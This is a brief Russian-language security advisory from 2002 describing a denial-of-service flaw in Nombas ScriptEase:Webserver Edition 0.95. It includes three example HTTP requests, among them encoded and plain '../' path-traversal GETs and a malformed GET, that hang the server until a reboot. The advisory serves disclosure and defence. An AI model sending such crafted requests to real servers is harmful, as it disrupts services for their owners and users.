Security Lab

Еще один DoS против Nombas ScriptEase:Webserver Edition

Дата публикации:26.02.2002
Всего просмотров:967
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Nombas ScriptEase:Webserver Edition разработан для развития Web приложений в Javascript. Программа включает способность выполнять Javascript код в ответ на CGI запросы.

Передача определенно составленного запроса, приведет к зависанию сервера. Для восстановления нормальной работы потребуется перезагрузка.

Примеры:
1. GET /%2e%2e/ HTTP/1.0
2. GET /../../../../../../../../../ HTTP/1.0
3. GET HTTP/1.0

Уязвимость найдена в Nombas ScriptEase: Webserver Edition 0.95